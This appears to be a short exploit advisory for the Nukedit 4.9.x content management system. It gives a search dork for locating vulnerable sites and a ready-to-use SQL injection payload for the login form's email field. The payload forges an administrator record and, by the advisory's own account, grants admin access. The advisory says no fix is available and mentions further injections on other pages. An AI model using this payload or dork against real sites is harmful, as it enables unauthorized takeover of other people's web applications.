#Title: Nukedit 4.9.x Login Bypass SQL injection # #Discovered By: r3dm0v3 # http://r3dm0v3.persianblog.ir # r3dm0v3( 4t ) yahoo [dot] com # Tehran - Iran # #Download: http://www.nukedit.com/content/Download.asp #Vulnerables: 4.9.x, prior versions maybe vulnerable #Remote: Yes #Dork: "Powered by Nukedit" # inurl:utilities/login.asp #Fix: Not Available #POC: #goto http://target.com/[path_to_nukedit]/utilities/login.asp and fill login fields as below: #Email: ' union select 1,1,'r3dm0v3',4,'ENCfc2aef9fe5f2c546429e2e1d9fd737e6da5b1b94707518619576129a915d0c2c',6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 from tblusers where 'x'='x #Password: r3dm0v3 #Click Login and you will get in as an admin. #There some other sql injections in other pages.